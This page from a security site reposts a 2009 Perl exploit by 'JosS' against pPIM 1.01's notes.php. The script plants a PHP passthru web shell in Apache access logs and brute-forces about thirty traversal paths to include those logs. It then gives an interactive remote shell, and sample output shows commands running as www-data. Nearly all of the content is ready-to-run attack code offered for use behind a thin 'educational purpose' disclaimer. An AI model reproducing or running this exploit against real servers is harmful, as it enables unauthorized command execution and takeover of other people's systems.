首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 pPIM 1.01 (notes.php id) Remote Command Execution Exploit 来源：http://www.hack0wn.com/ 作者：JosS 发布时间：2009-02-24   #!/usr/bin/perl #################################################################### # pPIM 1.01 (notes.php id) Remote Command Execution Exploit # url: http://www.phlatline.org/docs/files/ppim.zip # # Author: Jose Luis Gongora Fernandez (a.k.a) JosS # mail: sys-project[at]hotmail[dot]com # site: http://www.hack0wn.com/ # team: Spanish Hackers Team - [SHT] # # thanks for the base code: CWH Underground # but I changed many things and fix bugs. # # Hack0wn Security Project!! # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # #################################################################### # OUTPUT: (tested on localhost) # # Trying to Inject the Code... # Successfully injected in ../../../../../../../var/log/apache2/access.log # # [shell]:~$ id #  uid=33(www-data) gid=33(www-data) groups=33(www-data) # [shell]:~$ uname -a #  Linux h4x0rz 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux # [shell]:~$ exit # joss@h4x0rz:~/Desktop$         use LWP::UserAgent; use IO::Socket; use LWP::Simple; @apache=(         "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../apache/logs/error.log", "../../../../../../../apache/logs/access.log", "../../../../../../../etc/httpd/logs/acces_log", "../../../../../../../etc/httpd/logs/acces.log", "../../../../../../../etc/httpd/logs/error_log", "../../../../../../../etc/httpd/logs/error.log", "../../../../../../../var/www/logs/access_log", "../../../../../../../var/www/logs/access.log", "../../../../../../../usr/local/apache/logs/access_log", "../../../../../../../usr/local/apache/logs/access.log", "../../../../../../../var/log/apache/access_log", "../../../../../../../var/log/apache2/access_log", "../../../../../../../var/log/apache/access.log", "../../../../../../../var/log/apache2/access.log", "../../../../../../../var/log/access_log", "../../../../../../../var/log/access.log", "../../../../../../../var/www/logs/error_log", "../../../../../../../var/www/logs/error.log", "../../../../../../../usr/local/apache/logs/error_log", "../../../../../../../usr/local/apache/logs/error.log", "../../../../../../../var/log/apache/error_log", "../../../../../../../var/log/apache2/error_log", "../../../../../../../var/log/apache/error.log", "../../../../../../../var/log/apache2/error.log", "../../../../../../../var/log/error_log", "../../../../../../../var/log/error.log", "../../../../../var/log/access_log", "../../../../../var/log/access_log" ); system(($^O eq 'MSWin32') ? 'cls' : 'clear');         print "#######################################################################\n";         print "# pPIM 1.01 (notes.php id) Remote Command Execution Exploit | By JosS #\n";         print "#######################################################################\n\n";         if (!$ARGV[0])            {              print "Usage: perl exploit.pl [host]\n";              print "       perl exploit.pl localhost\n\n";         exit;} $host=$ARGV[0];         $path="/notes.php?mode=edit&id="; # change if it is necesary # if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;} print "\nTrying to Inject the Code...\n"; $CODE="<? passthru(\$_GET[cmd]) ?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n"; print $socket "GET /images/"."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#" . "HTTP/1.1"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); if ( $host   !~   /^http:/ ) {$host = "http://" . $host;} foreach $getlog(@apache)                 {                   chomp($getlog);            $find= $host.$path.$getlog; # $find= $host.$path.$getlog."%00";                   $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";   $req = HTTP::Request->new(GET => $find);   $res = $xpl->request($req);   $info = $res->content;                   if($info =~ /\#\#\%\$\$\%\#\#/) # change if it is necesary                   {print "Successfully injected in $getlog \n\n";$log=$getlog; last;}                 } print "[shell]:~\$ "; chomp( $cmd = <STDIN> ); while($cmd !~ "exit") {   $shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."%00&cmd=$cmd"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; $req = HTTP::Request->new(GET => $shell); $res = $xpl->request($req); $info = $res->content; if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) {print $1;} print "[shell]:~\$ "; chomp( $cmd = <STDIN> ); }                   # __h0__   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Mozilla Firefox 3.0.6 (BODY on ·Free Arcade Script 1.0 LFI Com ·Pyrophobia 2.1.3.1 LFI Command ·Adobe Acrobat Reader JBIG2 Loc ·MDPro Module My_eGallery (pid) ·linux/x86 chmod("/etc/shadow", ·pPIM 1.0 Multiple Remote Vulne ·win32 XP sp2 (FR) Sellcode cmd ·Apple MACOS X xnu <= 1228.x Lo ·Graugon Forum v1 (id) SQL Comm ·MS Internet Explorer 7 Memory ·Coppermine Photo Gallery <= 1.   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved